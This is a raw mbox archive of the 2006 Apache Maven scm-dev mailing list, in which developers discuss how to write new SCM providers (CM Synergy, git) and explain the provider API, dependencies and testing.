=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=20 This e-mail communication (and any attachment/s) may contain confidential=20 or privileged information and is intended only for the individual(s) or=20 entity named above and to others who have been specifically authorized to=20 receive it. If you are not the intended recipient, please do not read,=20 copy, use or disclose the contents of this communication to others. Please = notify the sender that you have received this e-mail in error by reply=20 e-mail, and delete the e-mail subsequently.=20 Thank you.=20 =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=20 Ce message (ainsi que le(s) fichier/s), transmis par courriel, peut=20 contenir des renseignements confidentiels ou prot=E9g=E9s et est destin=E9 = =E0=20 l?usage exclusif du destinataire ci-dessus. Toute autre personne est par=20 les pr=E9sentes avis=E9e qu?il est strictement interdit de le diffuser, le = distribuer ou le reproduire. Si vous l?avez re=E7u par inadvertance,=20 veuillez nous en aviser et d=E9truire ce message.=20 Merci.=20 =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=20 --=_alternative 0031C6ACC1257138_= Content-Type: text/html; charset="ISO-8859-1" Content-Transfer-Encoding: quoted-printable <br><font size=3D2 face=3D"sans-serif">Hi,</font> <br> <br><font size=3D2 face=3D"sans-serif">I have recently started to use Maven for a Java product we have. We are using CM Synergy as our SCM tool and I would like to try to add support for CM Synergy to Maven SCM. </font> <br> <br><font size=3D2 face=3D"sans-serif">Can someone guide me what the process is to add this support?</font> <br><font size=3D2 face=3D"sans-serif"><br> I read on the Wiki that someone else started to do this, but I can't find any more information about this.</font> <br><font size=3D2 face=3D"sans-serif"><br> Best Regards<br> Henrik J=F6nsson<br> <br> Bombardier Transportation<br> <br> =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F <br> This e-mail communication (and any attachment/s) may contain confidential or privileged information and is intended only for the individual(s) or entity named above and to others who have been specifically authorized to receive it. If you are not the intended recipient, please do not read, copy, use or disclose the contents of this communication to others. Please notify the sender that you have received this e-mail in error by reply e-mail, and delete the e-mail subsequently. <br> Thank you. <br> =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F <br> <br> Ce message (ainsi que le(s) fichier/s), transmis par courriel, peut contenir des renseignements confidentiels ou prot=E9g=E9s et est destin=E9 =E0 l&#82= 17;usage exclusif du destinataire ci-dessus. Toute autre personne est par les pr=E9s= entes avis=E9e qu&#8217;il est strictement interdit de le diffuser, le distribuer= ou le reproduire. Si vous l&#8217;avez re=E7u par inadvertance, veuillez nous = en aviser et d=E9truire ce message. <br> Merci. <br> =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F <br> <br> </font> --=_alternative 0031C6ACC1257138_=-- From [email protected] Tue Mar 21 20:05:08 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 29691 invoked from network); 21 Mar 2006 20:05:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Mar 2006 20:05:07 -0000 Received: (qmail 33016 invoked by uid 500); 21 Mar 2006 20:05:06 -0000 Delivered-To: [email protected] Received: (qmail 32993 invoked by uid 500); 21 Mar 2006 20:05:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 32982 invoked by uid 99); 21 Mar 2006 20:05:06 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Mar 2006 12:05:06 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO zproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Mar 2006 12:05:05 -0800 Received: by zproxy.gmail.com with SMTP id 13so1565388nzp for <[email protected]>; Tue, 21 Mar 2006 12:04:44 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=googlemail.com; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=Im2ZZ9gJaP2KofhnkvdT6n4oPHcMETGzdaDGJI7iVWS5RaaFRt96uDlBj3dWHj+Vrh0E9Ed7mFu6cVJ/cJvfIiA3pMjZYaa22YNrdISmKrHzKNn5tGPMPK0dowr0713B8wzmsv//5IjNcFRhcVsPlrbBTOb2uIGK5qO1kfDqZn4= Received: by 161.129.204.104 with SMTP id e21mr3586408nzi; Tue, 21 Mar 2006 12:04:44 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 21 Mar 2006 12:04:44 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 21 Mar 2006 21:04:44 +0100 From: "Dominik Winter" <[email protected]> To: [email protected] Subject: git repository provider MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi, it seems that nobody works on a git provider so far. So I started to implement one. Creating an archive ("repository"), adding files, checking out and committing changes work already. I use git itself as the SCM, of course. But I have no public place to host the git archive, yet. Any suggestions? Regards, 0x7f0c From [email protected] Wed Mar 22 14:53:21 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 80317 invoked from network); 22 Mar 2006 14:52:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Mar 2006 14:52:51 -0000 Received: (qmail 27079 invoked by uid 500); 22 Mar 2006 14:52:05 -0000 Delivered-To: [email protected] Received: (qmail 26717 invoked by uid 500); 22 Mar 2006 14:52:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 26637 invoked by uid 99); 22 Mar 2006 14:52:03 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 22 Mar 2006 06:52:03 -0800 X-ASF-Spam-Status: No, hits=0.6 required=10.0 tests=HTML_MESSAGE,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO smtp2.transport.bombardier.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 22 Mar 2006 06:52:02 -0800 Received: from EMEAML02.UK.BOMBARDIER.TRANSPORT.COM (emea-ml02.atle.bombardier.com [161.129.204.104]) by smtp2.transport.bombardier.com (Switch-3.1.6/Switch-3.1.6) with ESMTP id k2MESn4x019812 for <[email protected]>; Wed, 22 Mar 2006 15:51:29 +0100 (CET) To: [email protected] Subject: Implementing support for CM Synergy? MIME-Version: 1.0 X-Mailer: Lotus Notes Release 6.0 September 26, 2002 From: [email protected] Message-ID: <[email protected]> Date: Wed, 22 Mar 2006 15:41:12 +0100 X-MIMETrack: Serialize by Router on EMEA-ML02/Server/Transport/Bombardier(Release 6.0.3|September 18, 2003) at 03/22/2006 14:53:42, Serialize complete at 03/22/2006 14:53:42 Content-Type: multipart/alternative; boundary="=_alternative 00507704C1257139_=" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multipart message in MIME format. --=_alternative 00507704C1257139_= Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: quoted-printable Hi, I posted this yesterday as well. But I haven't got any response yet. So=20 I'll ask again. I want to implement support for CM Synergy. What baseline should I use? What do I need to check out? What class or interfaced do I need to implement? How can I test my provider? /Henrik =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=20 This e-mail communication (and any attachment/s) may contain confidential=20 or privileged information and is intended only for the individual(s) or=20 entity named above and to others who have been specifically authorized to=20 receive it. If you are not the intended recipient, please do not read,=20 copy, use or disclose the contents of this communication to others. Please = notify the sender that you have received this e-mail in error by reply=20 e-mail, and delete the e-mail subsequently.=20 Thank you.=20 =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=20 Ce message (ainsi que le(s) fichier/s), transmis par courriel, peut=20 contenir des renseignements confidentiels ou prot=E9g=E9s et est destin=E9 = =E0=20 l?usage exclusif du destinataire ci-dessus. Toute autre personne est par=20 les pr=E9sentes avis=E9e qu?il est strictement interdit de le diffuser, le = distribuer ou le reproduire. Si vous l?avez re=E7u par inadvertance,=20 veuillez nous en aviser et d=E9truire ce message.=20 Merci.=20 =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=20 --=_alternative 00507704C1257139_= Content-Type: text/html; charset="ISO-8859-1" Content-Transfer-Encoding: quoted-printable <br><font size=3D2 face=3D"sans-serif">Hi,</font> <br> <br><font size=3D2 face=3D"sans-serif">I posted this yesterday as well. But I haven't got any response yet. So I'll ask again.</font> <br> <br><font size=3D2 face=3D"sans-serif">I want to implement support for CM S= ynergy.</font> <br> <br><font size=3D2 face=3D"sans-serif">What baseline should I use?</font> <br><font size=3D2 face=3D"sans-serif">What do I need to check out?</font> <br><font size=3D2 face=3D"sans-serif">What class or interfaced do I need to implement?</font> <br><font size=3D2 face=3D"sans-serif">How can I test my provider?</font> <br> <br><font size=3D2 face=3D"sans-serif">/Henrik<br> <br> =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F <br> This e-mail communication (and any attachment/s) may contain confidential or privileged information and is intended only for the individual(s) or entity named above and to others who have been specifically authorized to receive it. If you are not the intended recipient, please do not read, copy, use or disclose the contents of this communication to others. Please notify the sender that you have received this e-mail in error by reply e-mail, and delete the e-mail subsequently. <br> Thank you. <br> =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F <br> <br> Ce message (ainsi que le(s) fichier/s), transmis par courriel, peut contenir des renseignements confidentiels ou prot=E9g=E9s et est destin=E9 =E0 l&#82= 17;usage exclusif du destinataire ci-dessus. Toute autre personne est par les pr=E9s= entes avis=E9e qu&#8217;il est strictement interdit de le diffuser, le distribuer= ou le reproduire. Si vous l&#8217;avez re=E7u par inadvertance, veuillez nous = en aviser et d=E9truire ce message. <br> Merci. <br> =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F <br> <br> </font> --=_alternative 00507704C1257139_=-- From [email protected] Wed Mar 22 18:27:43 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22307 invoked from network); 22 Mar 2006 18:27:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Mar 2006 18:27:43 -0000 Received: (qmail 26380 invoked by uid 500); 22 Mar 2006 18:27:42 -0000 Delivered-To: [email protected] Received: (qmail 26361 invoked by uid 500); 22 Mar 2006 18:27:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 26350 invoked by uid 99); 22 Mar 2006 18:27:42 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 22 Mar 2006 10:27:42 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO zproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 22 Mar 2006 10:27:41 -0800 Received: by zproxy.gmail.com with SMTP id i28so257494nzi for <[email protected]>; Wed, 22 Mar 2006 10:27:20 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=googlemail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=EYS2bPSGteAmdXWvp594mWJnBAja2i+u6TLWpDih5o1R8H+sdAJmdcVWA8r60R+RP6A5geixxv23mzJG0NRor8t84+tiL1P68WgPXXFBQx0BG7B2zXd9+6jCJGajXA2AqBt3Yt7IR1341VmnP26PSUvFdGrbQVGD9enrWECXbsA= Received: by 161.129.204.104 with SMTP id x69mr578039nzi; Wed, 22 Mar 2006 10:27:20 -0800 (PST) Received: by 161.129.204.104 with HTTP; Wed, 22 Mar 2006 10:27:20 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 22 Mar 2006 19:27:20 +0100 From: "Dominik Winter" <[email protected]> To: [email protected] Subject: Re: Implementing support for CM Synergy? In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi, let me help you. 2006/3/22, [email protected] <[email protected]>: > I want to implement support for CM Synergy. Okay. > What baseline should I use? What do your mean with baseline?? > What do I need to check out? Nothing. I use the cvs repository provider plugin as a reference. See http://maven.apache.org/scm/source-repository.html > What class or interfaced do I need to implement? First, I use the following dependencies: <dependency> <groupId>org.apache.maven.scm</groupId> <artifactId>maven-scm-api</artifactId> <version>1.0-beta-2</version> <scope>compile</scope> </dependency> <dependency> <groupId>org.apache.maven.scm</groupId> <artifactId>maven-scm-test</artifactId> <version>1.0-beta-2</version> <scope>test</scope> </dependency> <dependency> <groupId>org.codehaus.plexus</groupId> <artifactId>plexus-utils</artifactId> <version>1.1</version> <scope>compile</scope> </dependency> In maven-scm-api you'll find the abstract classes to extend. In maven-scm-test you'll find the abstract test classes to extend. In plexus-utils are some useful utility classes. - Create a provider class inherited from AbstractScmProvider, than create a provider repository class inherited from ScmProviderRepository, if necessary. - All commands are classes which are inherited from the abstract command class, e.g. the add command class extends AbstractAddCommand etc. > How can I test my provider? You can extend the ScmTestCase class. I don't use the command test classes in org.apache.maven.scm.tck.command.*, because they requires a test repository model which seems to be under development, because it differs between the command test classes. Running the JUnit test from eclipse doesn't work, you must call 'mvn test'. From [email protected] Wed Mar 22 21:04:26 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13960 invoked from network); 22 Mar 2006 21:04:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Mar 2006 21:04:23 -0000 Received: (qmail 58802 invoked by uid 500); 22 Mar 2006 21:04:22 -0000 Delivered-To: [email protected] Received: (qmail 58702 invoked by uid 500); 22 Mar 2006 21:04:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 44317 invoked by uid 99); 22 Mar 2006 20:54:58 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:mime-version:content-type; b=NCod82KPM45TPwXC+/pMQOODB+hitIRrcGFz47ejaL4P4CnE9SumWuJwTB1rbPdnyQ9Y3AkGvzQlBavZsdp7qO3NUSei7XZoxiXZPWk9VPctQoqtJg4IgOLYZo0yRUKppoyyUTzu+SpKrSVOTvb9y1htCUz+FOOwJ+QFlwYeKVQ= Message-ID: <[email protected]> Date: Wed, 22 Mar 2006 21:54:32 +0100 From: "Torbjorn Smorgrav" <[email protected]> To: [email protected] Subject: Re: Implementing support for CM Synergy? MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_18516_17438376.1143060872635" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_18516_17438376.1143060872635 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Hi Henrik! > I posted this yesterday as well. But I haven't got any response yet. So > I'll ask again. > I want to implement support for CM Synergy. I'll be happy to help you. I recently added the Bazaar provider (yet to be released) so I can at least guide you through the same path that I took. > What baseline should I use? Use the current development baseline. http://maven.apache.org/scm/source-repository.html > What do I need to check out? Start with: maven-scm-api/ <http://svn.apache.org/viewcvs.cgi/maven/scm/trunk/maven-scm= -api/> maven-scm-test/ <http://svn.apache.org/viewcvs.cgi/maven/scm/trunk/maven-scm-test/> And a reference provider eg. maven-scm-provider-bazaar/ <http://svn.apache.org/viewcvs.cgi/maven/scm/trunk/maven-scm-providers/mave= n-scm-provider-bazaar/> Perhapes choose one that is most similar to the CM Synergy > What class or interfaced do I need to implement? What I did was change the implementation of an existing provider. That way I got fast results and I learned the API one step at the time. Basically what you need to implements is an (Abstract)ScmProvider and its commands. > How can I test my provider? 1. Run unit tests from your IDE The test classes in maven-scm-test was really helpfull to me. Try to include a tck test as soon as possible. See how the tck tests are implemented in the reference provider (its a no brainer :). It can be a bit tricky to setup your IDE to pickup your current modifications and not the installed version of the provider. Let me know it this becomes a problem. 2. Build and install the provider and test it with eg. "mvn scm:checkout" on a project where you have defined a scm url in the pom.xml. This was probably a too short answer. But if you post your questions as they come, I'll do my best to help you. And in the end I like to make a mave-scm howto webpage with all of this. Good luck, Torbj=F8rn ------=_Part_18516_17438376.1143060872635 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline <pre>Hi Henrik!<br><br>&gt; I posted this yesterday as well. But I haven't = got any response yet. So <br>&gt; I'll ask again.<br>&gt; I want to impleme= nt support for CM Synergy.<br><br>I'll be happy to help you. <br>I recently= added the Bazaar provider (yet to be released) so I can=20 <br>at least guide you through the same path that I took. <br><br>&gt; What= baseline should I use?<br><br>Use the current development baseline.<br><a = href=3D"http://maven.apache.org/scm/source-repository.html">http://maven.ap= ache.org/scm/source-repository.html </a><br><br>&gt; What do I need to check out?<br><br>Start with:<br><a name= =3D"maven-scm-api" href=3D"http://svn.apache.org/viewcvs.cgi/maven/scm/trun= k/maven-scm-api/"><br>maven-scm-api/</a><br><a name=3D"maven-scm-test" href= =3D"http://svn.apache.org/viewcvs.cgi/maven/scm/trunk/maven-scm-test/"> maven-scm-test/</a><br><br>And a reference provider eg. <a name=3D"maven-sc= m-provider-bazaar" href=3D"http://svn.apache.org/viewcvs.cgi/maven/scm/trun= k/maven-scm-providers/maven-scm-provider-bazaar/">maven-scm-provider-bazaar= / </a><br>Perhapes choose one that is most similar to the CM Synergy<br><br>&= gt; What class or interfaced do I need to implement?<br><br>What I did was = change the implementation of an existing provider.<br>That way I got fast r= esults and I learned the API one step at the time. <br><br>Basically what you need to implements is an (Abstract)ScmProvider a= nd its commands.<br><br>&gt; How can I test my provider?<br><br>1. Run unit= tests from your IDE<br>The test classes in maven-scm-test was really helpf= ull to me. Try to include a tck test <br>as soon as possible. See how the tck tests are implemented in the refer= ence provider (its a no brainer :).<br><br>It can be a bit tricky to setup = your IDE to pickup your current modifications and not the installed <br> version of the provider. Let me know it this becomes a problem.<br><br>2. B= uild and install the provider and test it with eg. &quot;mvn scm:checkout&q= uot; on a project where<br>you have defined a scm url in the pom.xml.<br> <br>This was probably a too short answer. But if you post your questions as= they come,<br>I'll do my best to help you. And in the end I like to make a= mave-scm howto webpage<br>with all of this.<br><br>Good luck,<br>Torbj=F8r= n <br></pre> ------=_Part_18516_17438376.1143060872635-- From [email protected] Wed Mar 22 21:08:29 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16432 invoked from network); 22 Mar 2006 21:08:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Mar 2006 21:08:29 -0000 Received: (qmail 71779 invoked by uid 500); 22 Mar 2006 21:08:29 -0000 Delivered-To: [email protected] Received: (qmail 71756 invoked by uid 500); 22 Mar 2006 21:08:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 71745 invoked by uid 99); 22 Mar 2006 21:08:28 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 22 Mar 2006 13:08:28 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 22 Mar 2006 13:08:28 -0800 Received: (qmail 24477 invoked from network); 22 Mar 2006 21:08:08 -0000 Received: from 251.29.98-84.rev.gaoland.net (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 22 Mar 2006 21:08:08 -0000 Message-ID: <[email protected]> Date: Wed, 22 Mar 2006 22:07:53 +0100 From: Emmanuel Venisse <[email protected]> User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716) X-Accept-Language: fr, en MIME-Version: 1.0 To: [email protected] Subject: Re: Implementing support for CM Synergy? References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N If you extend the maven-scm-providers pom like other providers, it will be more easy to start with dependencies. Emmanuel Torbjorn Smorgrav a écrit : > Hi Henrik! > >> I posted this yesterday as well. But I haven't got any response yet. So >> I'll ask again. >> I want to implement support for CM Synergy. > > I'll be happy to help you. > I recently added the Bazaar provider (yet to be released) so I can > > at least guide you through the same path that I took. > >> What baseline should I use? > > Use the current development baseline. > http://maven.apache.org/scm/source-repository.html > <http://maven.apache.org/scm/source-repository.html> > >> What do I need to check out? > > Start with: > > maven-scm-api/ <http://svn.apache.org/viewcvs.cgi/maven/scm/trunk/maven-scm-api/> > > maven-scm-test/ 